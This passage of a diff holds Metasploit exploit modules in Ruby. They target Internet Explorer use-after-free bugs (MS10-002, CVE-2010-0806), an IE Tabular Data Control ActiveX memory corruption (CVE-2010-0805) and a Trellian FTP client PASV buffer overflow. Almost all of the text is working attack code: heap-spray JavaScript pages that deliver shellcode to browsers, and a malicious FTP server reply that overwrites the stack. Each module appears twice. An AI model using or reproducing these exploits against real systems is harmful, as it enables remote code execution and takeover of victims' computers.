var t = #{var_event}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
</body>
</html>|
print_status("Sending #{self.name} to client #{cli.peerhost}")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision$',
'References' =>
[
['MSB', 'MS10-002'],
['CVE', '2010-0249'],
['OSVDB', '61697'],
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
var_boom = rand_text_alpha(rand(100) + 1)
var_element = rand_text_alpha(rand(100) + 1)
var_event = rand_text_alpha(rand(100) + 1)
var_loaded = rand_text_alpha(rand(100) + 1)
var_loaded_arg = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_el_array = rand_text_alpha(rand(100) + 1)
bleh = rand_text_alpha(3);
var_grab_mem = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_span_id = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
#{var_el_array}[i] = document.createElement(#{var_element});
#{var_el_array}[i].data = "#{bleh}";
}
var #{var_event} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}()
{
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_loaded}(#{var_loaded_arg})
{
#{var_boom}();
#{var_event} = document.createEventObject(#{var_loaded_arg});
document.getElementById("#{var_span_id}").innerHTML = "";
window.setInterval(#{var_grab_mem}, 50);
}
function #{var_grab_mem}()
{
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_el_array}.length; i++)
{
#{var_el_array}[i].data = p;
}
var t = #{var_event}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
</body>
</html>|
print_status("Sending #{self.name} to client #{cli.peerhost}")
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
end


@ -1,252 +1,252 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# originally ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability within the DHTML behaviors
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
discovered being used in-the-wild and was previously known as the "iepeers"
vulnerability. The name comes from Microsoft's suggested workaround to block
access to the iepeers.dll file.
According to Nico Waisman, "The bug itself is when trying to persist an object
using the setAttribute, which end up calling VariantChangeTypeEx with both the
source and the destination being the same variant. So if you send as a variant
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the reference
and clean the object."
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'Nanika', # HIT2010 IE7 reliable PoC
'jduck' # minor cleanups
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
[ 'MSB', 'MS10-018' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
{
'Method' => 'automatic'
}
],
[ 'IE 6 SP0-SP2 (onclick)',
{
'Method' => 'onclick',
'Ret' => 0x0C0C0C0C
}
],
# "A great celebration of HIT2010" - http://www.hitcon.org/
[ 'IE 7.0 (marquee)',
{
'Method' => 'marquee',
'Ret' => 0x0C0C0C0C
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def auto_target(cli, request)
mytarget = nil
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent =~ /Windows NT 6\.0/
mytarget = targets[2] # IE7 on Vista
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2] # IE7 on XP and 2003
elsif agent =~ /MSIE 6\.0/
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
def on_request_uri(cli, request)
if target['Method'] == 'automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
else
mytarget = target
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Construct the final page
case mytarget['Method']
when 'onclick'
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>
|
when 'marquee'
j_attrib = rand_text_alpha(6);
html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}() {
#{j_function1}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|
end
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# originally ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability within the DHTML behaviors
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
discovered being used in-the-wild and was previously known as the "iepeers"
vulnerability. The name comes from Microsoft's suggested workaround to block
access to the iepeers.dll file.
According to Nico Waisman, "The bug itself is when trying to persist an object
using the setAttribute, which end up calling VariantChangeTypeEx with both the
source and the destination being the same variant. So if you send as a variant
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
using it. This will end up on a call to PlainRelease which deref the reference
and clean the object."
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'Nanika', # HIT2010 IE7 reliable PoC
'jduck' # minor cleanups
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0806' ],
[ 'OSVDB', '62810' ],
[ 'BID', '38615' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
[ 'MSB', 'MS10-018' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
{
'Method' => 'automatic'
}
],
[ 'IE 6 SP0-SP2 (onclick)',
{
'Method' => 'onclick',
'Ret' => 0x0C0C0C0C
}
],
# "A great celebration of HIT2010" - http://www.hitcon.org/
[ 'IE 7.0 (marquee)',
{
'Method' => 'marquee',
'Ret' => 0x0C0C0C0C
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def auto_target(cli, request)
mytarget = nil
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent =~ /Windows NT 6\.0/
mytarget = targets[2] # IE7 on Vista
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2] # IE7 on XP and 2003
elsif agent =~ /MSIE 6\.0/
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
def on_request_uri(cli, request)
if target['Method'] == 'automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
else
mytarget = target
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_array = rand_text_alpha(rand(100) + 1)
j_function1 = rand_text_alpha(rand(100) + 1)
j_function2 = rand_text_alpha(rand(100) + 1)
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Construct the final page
case mytarget['Method']
when 'onclick'
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').onclick();
</script></body></html>
|
when 'marquee'
j_attrib = rand_text_alpha(6);
html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}() {
#{j_function1}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|
end
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end


@ -1,123 +1,123 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability in the Internet Explorer
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
Explorer are vulnerable.
By specifying a long value as the "DataURL" parameter to this control, it is possible
to write a NUL byte outside the bounds of an array. By targeting control flow data
on the stack, an attacker can execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anonymous', # original discovery
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0805' ],
[ 'OSVDB', '63329' ],
[ 'BID', '39025' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
[ 'MSB', 'MS10-018' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (Heap Spray)',
{
'Ret' => 0x0c0c0c0c
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# ActiveX parameters
#progid =
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
# exploit url
url = "http://"
#url << rand_text_alphanumeric(258)
url << rand_text_alphanumeric(258+0x116+2)
# Construct the final page
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
html = %Q|<html><body>
<script>
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}("#{ret * 2}");
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
</script>
<object classid='clsid:#{clsid}'>
<param name='DataURL' value='#{url}'/>
</object>
</body></html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
'Description' => %q{
This module exploits a memory corruption vulnerability in the Internet Explorer
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
Explorer are vulnerable.
By specifying a long value as the "DataURL" parameter to this control, it is possible
to write a NUL byte outside the bounds of an array. By targeting control flow data
on the stack, an attacker can execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anonymous', # original discovery
'jduck' # metasploit version
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2010-0805' ],
[ 'OSVDB', '63329' ],
[ 'BID', '39025' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
[ 'MSB', 'MS10-018' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic (Heap Spray)',
{
'Ret' => 0x0c0c0c0c
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
# ActiveX parameters
#progid =
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
# exploit url
url = "http://"
#url << rand_text_alphanumeric(258)
url << rand_text_alphanumeric(258+0x116+2)
# Construct the final page
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
html = %Q|<html><body>
<script>
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}("#{ret * 2}");
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
</script>
<object classid='clsid:#{clsid}'>
<param name='DataURL' value='#{url}'/>
</object>
</body></html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end


@ -1,93 +1,93 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
through an excessively long PASV message.
},
'Author' =>
[
'zombiefx', # Original exploit author
'dookie' # MSF module author
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x29\x2c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
],
'Privileged' => false,
'DisclosureDate' => 'April 11 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
# Let the client log in
client.get_once
user = "331 Please specify the password.\r\n"
client.put(user)
client.get_once
pass = "230 Login successful.\r\n"
client.put(pass)
# Handle the clients PWD command
client.get_once
pwd = "257 \"/\" is current directory.\r\n"
client.put(pwd)
client.get_once
sploit = "227 Entering Passive Mode ("
sploit << rand_text_alpha_upper(2171)
sploit << make_nops(100)
sploit << payload.encoded
sploit << make_nops(900 - (payload.encoded.length))
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
sploit << [target.ret].pack("A3")
sploit << ")\r\n"
client.put(sploit)
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
through an excessively long PASV message.
},
'Author' =>
[
'zombiefx', # Original exploit author
'dookie' # MSF module author
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x29\x2c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
],
'Privileged' => false,
'DisclosureDate' => 'April 11 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
# Let the client log in
client.get_once
user = "331 Please specify the password.\r\n"
client.put(user)
client.get_once
pass = "230 Login successful.\r\n"
client.put(pass)
# Handle the clients PWD command
client.get_once
pwd = "257 \"/\" is current directory.\r\n"
client.put(pwd)
client.get_once
sploit = "227 Entering Passive Mode ("
sploit << rand_text_alpha_upper(2171)
sploit << make_nops(100)
sploit << payload.encoded
sploit << make_nops(900 - (payload.encoded.length))
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
sploit << [target.ret].pack("A3")
sploit << ")\r\n"
client.put(sploit)
end
end
